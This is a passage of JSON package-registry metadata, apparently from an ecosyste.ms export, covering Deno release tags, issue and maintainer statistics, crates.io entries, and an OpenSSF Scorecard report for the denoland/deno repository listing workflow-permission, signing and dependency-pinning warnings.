"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-26T07:24:49.397Z","dependent_packages_count":0,"downloads":589,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":89.5209992393904,"dependent_repos_count":29.318292202377133,"dependent_packages_count":33.81230354737315,"stargazers_count":0.039405075007102074,"forks_count":0.09805448897116098,"average":30.55781091062379},"purl":"pkg:cargo/pacstall-rs","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/pacstall-rs","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/pacstall-rs","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/pacstall-rs/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-25T19:48:12.804Z","issues_count":6610,"pull_requests_count":9623,"avg_time_to_close_issue":17236144.535497494,"avg_time_to_close_pull_request":1534358.7653889374,"issues_closed_count":3787,"pull_requests_closed_count":8008,"pull_request_authors_count":577,"issue_authors_count":2467,"avg_comments_per_issue":2.509531013615734,"avg_comments_per_pull_request":0.7160968512937753,"merged_pull_requests_count":6992,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":664,"past_year_pull_requests_count":1191,"past_year_avg_time_to_close_issue":1367826.3136363637,"past_year_avg_time_to_close_pull_request":1331942.9891472869,"past_year_issues_closed_count":220,"past_year_pull_requests_closed_count":645,"past_year_pull_request_authors_count":182,"past_year_issue_authors_count":368,"past_year_avg_comments_per_issue":1.216867469879518,"past_year_avg_comments_per_pull_request":1.0839630562552478,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":474,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1789,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":386,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":188,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacstall-rs/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacstall-rs/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacstall-rs/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacstall-rs/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacstall-rs/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacstall-rs/codemeta","maintainers":[{"uuid":"193057","login":"TylerJerme","name":null,"email":null,"url":"https://github.com/TylerJerme","packages_count":4,"html_url":"https://crates.io/users/TylerJerme","role":null,"created_at":"2023-01-11T08:26:39.376Z","updated_at":"2023-01-11T08:26:39.376Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/TylerJerme/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":14652559,"name":"deno_cli_parser","ecosystem":"cargo","description":"Zero-cost CLI argument parser for the Deno CLI","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":8,"first_release_published_at":"2026-06-18T21:04:25.237Z","latest_release_published_at":"2026-08-27T15:22:52.025Z","latest_release_number":"0.8.0","last_synced_at":"2026-08-29T21:56:49.562Z","created_at":"2026-06-18T21:19:29.293Z","updated_at":"2026-08-30T20:52:20.339Z","registry_url":"https://crates.io/crates/deno_cli_parser/","install_command":"cargo install deno_cli_parser","documentation_url":"https://docs.rs/deno_cli_parser/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using 